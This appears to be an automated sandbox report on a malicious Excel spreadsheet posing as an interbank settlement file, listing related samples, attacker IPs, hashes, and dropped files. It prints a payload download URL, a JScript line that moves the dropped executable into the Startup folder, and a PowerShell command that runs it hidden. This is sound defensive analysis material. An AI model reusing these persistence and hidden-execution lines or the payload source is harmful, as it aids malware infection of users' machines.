SKB-ENTERPRISENL	Vessel Line Up 7105082938.exe	Get hash	malicious	Browse	45.148.121.68
	dwg.exe	Get hash	malicious	Browse	45.148.121.68
	carirstlite.exe	Get hash	malicious	Browse	45.148.120.153
	LA99293P02.xls	Get hash	malicious	Browse	45.148.121.138
	p1nY2hwmIl.exe	Get hash	malicious	Browse	45.148.120.173
	c4kSaiN1ja.exe	Get hash	malicious	Browse	45.148.120.173
	zKOi8vCorq.exe	Get hash	malicious	Browse	45.148.120.173
	w3QgrgNAWs.exe	Get hash	malicious	Browse	45.148.120.173
	yWWZnMPf9D.exe	Get hash	malicious	Browse	45.148.120.173
	B5qp0eVSkw.exe	Get hash	malicious	Browse	45.148.120.173
	Lz8lkpUFxJ.exe	Get hash	malicious	Browse	45.148.120.142
	mMqGgKfeL6.exe	Get hash	malicious	Browse	45.148.120.142
	IIhgjzqAwH.exe	Get hash	malicious	Browse	45.148.120.142
	MyBNQ4qrLn.exe	Get hash	malicious	Browse	45.148.120.142
	e4vMDSPGNX.exe	Get hash	malicious	Browse	45.148.120.142
	qA655H06I0.exe	Get hash	malicious	Browse	45.148.120.142
	XAwxv0OlTG.exe	Get hash	malicious	Browse	45.148.120.173
	wIKefPv0H6.exe	Get hash	malicious	Browse	45.148.120.142
	C9pzzdQD2W.exe	Get hash	malicious	Browse	45.148.120.142
	n0a5os44N8.exe	Get hash	malicious	Browse	45.148.120.142

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	muOvK6dngg.exe	Get hash	malicious	Browse	185.199.108.133
	SKBM 0222..exe	Get hash	malicious	Browse	185.199.108.133
	Vessel Line Up 7105082938.exe	Get hash	malicious	Browse	185.199.108.133
	ProtonVPN.exe	Get hash	malicious	Browse	185.199.108.133
	PO 86540.exe	Get hash	malicious	Browse	185.199.108.133
	RTM DIAS - CTM.exe	Get hash	malicious	Browse	185.199.108.133
	uTorrent.exe	Get hash	malicious	Browse	185.199.108.133
	hreheh.exe	Get hash	malicious	Browse	185.199.108.133
	JFAaEh5hB6.exe	Get hash	malicious	Browse	185.199.108.133
	Dmjsru7tdt.exe	Get hash	malicious	Browse	185.199.108.133
	Documents_pdf.exe	Get hash	malicious	Browse	185.199.108.133
	BANK SWIFT- USD 98,712.00.pdf.exe	Get hash	malicious	Browse	185.199.108.133
	BMfiIGROO2.exe	Get hash	malicious	Browse	185.199.108.133
	dwg.exe	Get hash	malicious	Browse	185.199.108.133
	Q8XSs7tx9Y.exe	Get hash	malicious	Browse	185.199.108.133
	VYTqKrm2vw.exe	Get hash	malicious	Browse	185.199.108.133
	QzV0wbwrxW.exe	Get hash	malicious	Browse	185.199.108.133
	Inv_874520.exe	Get hash	malicious	Browse	185.199.108.133
	Inv_95736.scr.exe	Get hash	malicious	Browse	185.199.108.133
	drWcfynA5k.exe	Get hash	malicious	Browse	185.199.108.133
37f463bf4616ecd445d4a1937da06e19	GUEROLA INDUSTRIES N#U00ba de cuenta.exe	Get hash	malicious	Browse	185.162.146.6
	receipt145.htm	Get hash	malicious	Browse	185.162.146.6
	xerox for hycite.htm	Get hash	malicious	Browse	185.162.146.6
	SecuriteInfo.com.Heur.15528.xls	Get hash	malicious	Browse	185.162.146.6
	Muligheds.exe	Get hash	malicious	Browse	185.162.146.6
	DHL_6368638172 documento de recibo,pdf.exe	Get hash	malicious	Browse	185.162.146.6
	PDF.exe	Get hash	malicious	Browse	185.162.146.6
	pagamento.exe	Get hash	malicious	Browse	185.162.146.6
	message_zdm (2).html	Get hash	malicious	Browse	185.162.146.6
	Statement-ID28865611496334.vbs	Get hash	malicious	Browse	185.162.146.6
	Statement-ID21488878391791.vbs	Get hash	malicious	Browse	185.162.146.6
	frank_2021-02-22_02-03.exe	Get hash	malicious	Browse	185.162.146.6
	Statement-ID72347595684775.vbs	Get hash	malicious	Browse	185.162.146.6
	MR52.vbs	Get hash	malicious	Browse	185.162.146.6
	Scan_medcal equipment sample_pdf.exe	Get hash	malicious	Browse	185.162.146.6
	rfq02212021.exe	Get hash	malicious	Browse	185.162.146.6
	RE ICA 40 Sdn Bhd- Purchase Order#6769704.exe	Get hash	malicious	Browse	185.162.146.6
	RFQ-#09503.exe	Get hash	malicious	Browse	185.162.146.6
	RFQ_1101983736366355 1101938377388.exe	Get hash	malicious	Browse	185.162.146.6
	Offer Request 6100003768.exe	Get hash	malicious	Browse	185.162.146.6

Dropped Files

No context

Created / dropped Files

C:\ProgramData\a.exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	129536
Entropy (8bit):	3.949382785719168
Encrypted:	false
SSDEEP:	768:gHLIU+PDy4GL3Uuwu8uIufFGPIEgB/rCMApfxMwhOJaTSpjfK75rT2C+BHyjdDC/:icZy4GLR/BaDauDvLW7p
MD5:	7D9D8812398EAF9AC0D85E728BBF8637
SHA1:	C87EA3136E5941B9EBA79BB4621CAAFA7B65A462
SHA-256:	F0A487567534A44C564D2658C7A525E828B985DE773A4F513B3F0CDF10C09BDC
SHA-512:	DCC278E46E59913777DA5D49636D77BBAE06C7F9DA24C7DED43075A6F57702A2F1EDF8CEF4C1A767F2E6B529707EF0386685E86A44BFC75128946C27DB13C5E3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 28%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0.................. ... ....@.. .......................`............@.................................e...O.... ..h....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...h.... ......................@..@.reloc.......@......................@..B........................H...........L9..........h...p...........................................~..}.....(.......(.......(.....*.0...........#..........(....r...p(.....s.......{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#........7..#........7..#..........+......,T...#.......@(....Z.[.....(.......{......( ...o!......r'..p..( ...r1..p("...o#.....+..r7..p($...&..8.....{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#.....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
SHA-256:	123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
SHA-512:	1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\5EFF1992-5E5F-4DA8-8AEF-42656F09E2D5 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	132891
Entropy (8bit):	5.375886783043812
Encrypted:	false
SSDEEP:	1536:FcQceNquBXA3gBwJpQ9DQW+zA9H34ZldpKWXboOilXNErLdzEh:RcQ9DQW+z0XiK
MD5:	0D643781628FC550743656F163B7B2C0
SHA1:	03C6A85CDA29B28F86A475E6A57C31A55E8FD41D
SHA-256:	A5CFE9B472F67D9011F42812EA1D5792B537FD56CD35791CD12BBF05967628C0
SHA-512:	C192C591AD82E0CE03AA9BB4837ADB5D83B7642D98F1399F62C5A6AC338337F92D13A484B4D6CAA26007B723D85AA0AE9463658028D1D8591BB7F9D827E1AE4F
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-22T19:34:48">.. Build: 16.0.13817.30529-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\mensajeria_system[1].exe Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	downloaded
Size (bytes):	129536
Entropy (8bit):	3.949382785719168
Encrypted:	false
SSDEEP:	768:gHLIU+PDy4GL3Uuwu8uIufFGPIEgB/rCMApfxMwhOJaTSpjfK75rT2C+BHyjdDC/:icZy4GLR/BaDauDvLW7p
MD5:	7D9D8812398EAF9AC0D85E728BBF8637
SHA1:	C87EA3136E5941B9EBA79BB4621CAAFA7B65A462
SHA-256:	F0A487567534A44C564D2658C7A525E828B985DE773A4F513B3F0CDF10C09BDC
SHA-512:	DCC278E46E59913777DA5D49636D77BBAE06C7F9DA24C7DED43075A6F57702A2F1EDF8CEF4C1A767F2E6B529707EF0386685E86A44BFC75128946C27DB13C5E3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 8%, Browse Antivirus: ReversingLabs, Detection: 28%
Reputation:	low
IE Cache URL:	https://www.seyranikenger.com.tr/mensajeria_system.exe
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p................0.................. ... ....@.. .......................`............@.................................e...O.... ..h....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...h.... ......................@..@.reloc.......@......................@..B........................H...........L9..........h...p...........................................~..}.....(.......(.......(.....*.0...........#..........(....r...p(.....s.......{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#........7..#........7..#..........+......,T...#.......@(....Z.[.....(.......{......( ...o!......r'..p..( ...r1..p("...o#.....+..r7..p($...&..8.....{....o....o....r...p(........9......{....o....(......{....o....(......{....o....(......#.....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	17500
Entropy (8bit):	5.5817288422411035
Encrypted:	false
SSDEEP:	384:0t9/Uyi0wPHwy0ykT++SBKn7ulzXo8E7Y9nSJQpJ1G1FYKy:nIyru4K7ulz487RMYd
MD5:	42C524A4728FADB6FF7C310D6ED82279
SHA1:	A2797DED88353E88933F8E181FB04B779390E761
SHA-256:	87434CBE254F6417927D3EC7438E92416B00EE8F354DC68A43B2705F628FF8BE
SHA-512:	2784D41DEC52C02F13C17E6765E0C741AAE2F204C4E3F0B7036E3E99631EA23075AEB1BC7D20402B011CC251A975839C6899D4BB23B9D98FC3EFF4803D0A35F7
Malicious:	false
Reputation:	low
Preview:	@...e.....................K...........2.4............@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)a.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\44D40000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	228755
Entropy (8bit):	7.982874164570525
Encrypted:	false
SSDEEP:	6144:ukojHNQB2+Uvs6Tu0EA0le7mfFjnmQW/AVc9PA:uZhkpUv30SWmc2PA
MD5:	78BF0B0397A6E75562C0594BFF70118C
SHA1:	1B7682903B7714C42D24F2CC812EAF435129A682
SHA-256:	0414C25D5C90BA60C5B591B0F8F7D34F0D1B11AEF41DFA8FF1C95BF1C9C75844
SHA-512:	4FEDADFDC9B31DEE8623F6ED3BC78398F30CE05347D830867C0215207C0B39D010491B47EA7065375597F55066A49E7E28A3EF1E585F8C39BA60C84D6707043D
Malicious:	false
Preview:	.U.n.0....?.......a........>...[.,...&.?.q.H....%..'.._o{Wm0e.\|#..LT.u0...u...,.L.....;..z....~.1W..s#:..E..;.!.....*..._S.".5..>.f.....SM.C,..p.....-o.,.....w...........7.H.ZY.&..e......z'c.....B..}.i......H..e2G.$G........:.PN..0....L.`u..~@.n..S.!..!..i.bf.k.jtrpL..S..t.g`...#L..ChV...W.........v6.5y.\..'t..;..yN..%.0...v....^...t..........o...&.c.....}..&x7K.M.7j....i?..KX..C.....c...}.'%.....,>O...<Q.\JXF.As.[............PK..........!.._U1....c.......[Content_Types].xml ...(...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\499262.js Download File
Process:	C:\ProgramData\a.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.040848080507827
Encrypted:	false
SSDEEP:	3:qWlGYox7D/eJDcMj2bMJtnxyxPHkuWAX+Ro6p4E1C5rAuf5yaKXFof1aNFQkeyH:qoq7yJDIUtxyXWDKaJI5lR9ZQqsH
MD5:	D811BEEFA0EB4692BE15EC756BBAFE49
SHA1:	E930135BA7274A80F8C54514EF9AF857EF47226D
SHA-256:	75E457E09D751D547B5EE234BE96403FFED9ECE5D07C5C719B8B0B307F489027
SHA-512:	CC134E3E6A5C9F6ED9BD0CD2D54BB37064D7098F63281B0FCEDBC0B7C59D037E7090AA88B46EBB2EB8F34FCAA9282941F9CEF1E48EABEF8C6B40EF7AD7D2D3DD
Malicious:	false
Preview:	var FSO = WScript.CreateObject("Scripting.FileSystemObject"); try { FSO.MoveFile("C:\\PROGRAMDATA\\a.exe", "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\a.exe");} catch(err) {}

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0trfj0zt.2gs.psm1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pmghts1r.j24.ps1 Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 17:12:41 2019, mtime=Mon Feb 22 18:34:51 2021, atime=Mon Feb 22 18:34:51 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.660572663633042
Encrypted:	false
SSDEEP:	12:8XcXUNduCH2BvOn429lte+WrjAZ/DYbDtTSeuSeL44t2Y+xIBjKZm:85qm3tcAZbcDP7aB6m
MD5:	6A09C36C82320F791ECC5CB5ADC94109
SHA1:	7B04B3E55A22C8E57EC7D703C99F50395CA30062
SHA-256:	91DA8A11693569CCC881E89369333E946E8A1703EA61C80C6C438A725CA2DD4D
SHA-512:	DC8660E3B341C81161A32CF94B575F4E62B2D88D0AEA51A72E71D03294C5646227C0CA4DEF7E570E50C3684B78CEB139C26875711031C1463E3995E42C09C79A
Malicious:	false
Preview:	L..................F.............-..PA..Q.......Q.... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..VRL.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q}<..user.<.......N..VRL.....#J.....................f..j.o.n.e.s.....~.1.....VRZ...Desktop.h.......N..VRZ......Y..............>.......^.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......715575...........!a..%.H.VZAj...m<...............!a..%.H.VZAj...m<..........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\LIQUIDACION INTERBANCARIA 02_22_2021.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 06:35:54 2020, mtime=Mon Feb 22 18:34:51 2021, atime=Mon Feb 22 18:34:51 2021, length=783360, window=hide
Category:	dropped
Size (bytes):	2370
Entropy (8bit):	4.713596692352419
Encrypted:	false
SSDEEP:	48:89qmETt7N8wnDxB6p9qmETt7N8wnDxB6:89ZEZVK9ZEZV
MD5:	CD4FED673703D52A93764B0204B5E15D
SHA1:	A406F3644307BFAF03E79481380193D1D44E83C3
SHA-256:	97EAFE69390987506896844E9C3035E6F84A1CD3FE5BBEECAFE95EA43B0DCF31
SHA-512:	4FD4A8470AE10081DD4839A0266DC968384C9723DC7E5F82DA9B8A3D83644068A41C439E415A7D6E75DC2E7C9C94F616F0C977E3FD311B466AA6C3E7B849E3FA
Malicious:	false
Preview:	L..................F.... ....s.T........Q....D..Q................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..VRL.....................:......;..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Q}<..user.<.......N..VRL.....#J.....................f..j.o.n.e.s.....~.1.....>Q.<..Desktop.h.......N..VRM......Y..............>......h..D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....VRU. .LIQUID~1.XLS.........>Q\|<VRU......V......................c.L.I.Q.U.I.D.A.C.I.O.N. .I.N.T.E.R.B.A.N.C.A.R.I.A. .0.2._.2.2._.2.0.2.1...x.l.s.......n...............-.......m...........>.S......C:\Users\user\Desktop\LIQUIDACION INTERBANCARIA 02_22_2021.xls..?.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.L.I.Q.U.I.D.A.C.I.O.N. .I.N.T.E.R.B.A.N.C.A.R.I.A. .0.2._.2.2._.2.0.2.1...x.l.s.........:..,.LB.)...As...`.......X.......715575...........!a..%.H.VZAj....................!a..%.H.VZAj...............................1SPS.XF.L8C....&

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	161
Entropy (8bit):	4.645820606938903
Encrypted:	false
SSDEEP:	3:oyBVomMHvLJ0rmkT46lxaAvLJ0rmkT46lmMHvLJ0rmkT46lv:dj6UTtjaTTtxUTt1
MD5:	618DC56A1C2E874ECEFE016D75912A39
SHA1:	E59AAD8BC8D58CDC964EEA6E53F8984B28CFA4EB
SHA-256:	01F801B1C3886DD726A351A3D1E028F996751D6F45823B4DDD81571F9DD1E6A2
SHA-512:	FFB6D23E8E6E1FFBB9C08EC78B2A7865E787C8CAAC5FB351BD1DF31F3039CE1DA763CB4B04B48972B94A5A7809D90453DE0A4DEA987962F5AEEE48B99FC92841
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..[xls]..LIQUIDACION INTERBANCARIA 02_22_2021.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	Little-endian UTF-16 Unicode text, with CR line terminators
Category:	dropped
Size (bytes):	22
Entropy (8bit):	2.9808259362290785
Encrypted:	false
SSDEEP:	3:QAlX0Gn:QKn
MD5:	7962B839183642D3CDC2F9CEBDBF85CE
SHA1:	2BE8F6F309962ED367866F6E70668508BC814C2D
SHA-256:	5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6
SHA-512:	2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342
Malicious:	false
Preview:	....p.r.a.t.e.s.h.....

C:\Users\user\Documents\20210222\PowerShell_transcript.715575.WxOfaCb9.20210222203513.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1159
Entropy (8bit):	5.151442141703947
Encrypted:	false
SSDEEP:	24:BxSAT7vBZRwZx2DOXdBmmuVMJWDHjeTKKjX4CIym1ZJX0BmmuVMAenxSAZ9:BZ3vjqZoONFuLDqDYB1ZOFuoZZ9
MD5:	E8D42F7E2203EC0D4EC7D77177CB8D26
SHA1:	71E6B5B24C6AFC00E0054065D950917AE525C1B4
SHA-256:	3CE51F8AD8E172D7E19760EC05542DB5F1D4EE0F0088B12015CC29198990A68D
SHA-512:	08553CFEAF5B40267FFDF7A70FEB6FB20FEAC6B4798A846BA9231BCB915B2BFD33D4C0C6013E310DBE3A43F6EDAA82304E5FA60BD6ABA4089F926F839AB4D054
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210222203528..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -command Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'..Process ID: 5596..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210222203528..******************..PS>Start-Sleep -s 4; Start-Process -WindowStyle hidden -FilePath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a.exe'..********************..Command start time: 2021022220

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Dexter MORGAN, Last Saved By: HP PC, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Dec 3 22:00:53 2020, Last Saved Time/Date: Mon Feb 22 09:51:33 2021, Security: 0
Entropy (8bit):	7.938164956946986
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	LIQUIDACION INTERBANCARIA 02_22_2021.xls
File size:	774656
MD5:	8cc0e4d5044939ef3d7a7d8825d8c9c9
SHA1:	61ca1ae2ac0fa0fb0f075ee09f9ff83985b5b66b
SHA256:	35cf92b551f09ba61770ce1c7c5dc73b3c3e291eb98948c87d430646370a103f
SHA512:	f73682a1b16ca4271e711a539a078e266e181ec7bc9927844d285b238e789fe1ca727acce8fc2f6997c0fed163f1777e442fc390529ed96ebdb533adfdea3716
SSDEEP:	12288:27xSO0ZMQQnQ3yUZLUXA2ZGoMxFrYETEwIhMA++KnoGnkp4zL0mJm8gz:27EkznQ3bZIXASFEQwIhMA++LGkp4wmY
File Content Preview:	........................>.......................................................b.......d.......f.......h.......j.......l......................................................................................................................................

File Icon


Icon Hash:	74ecd4c6c3c6c4d8

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "LIQUIDACION INTERBANCARIA 02_22_2021.xls"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Excel
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Author:	Dexter MORGAN
Last Saved By:	HP PC
Create Time:	2020-12-03 22:00:53
Last Saved Time:	2021-02-22 09:51:33
Creating Application:	Microsoft Excel
Security:	0

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams with VBA

VBA File Name: Feuil1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Feuil1
VBA File Name:	Feuil1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 1a aa 91 12 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
VB_Exposed
Attribute
VB_Name
VB_Creatable
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
False
VB_TemplateDerived

VBA Code

Attribute VB_Name = "Feuil1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
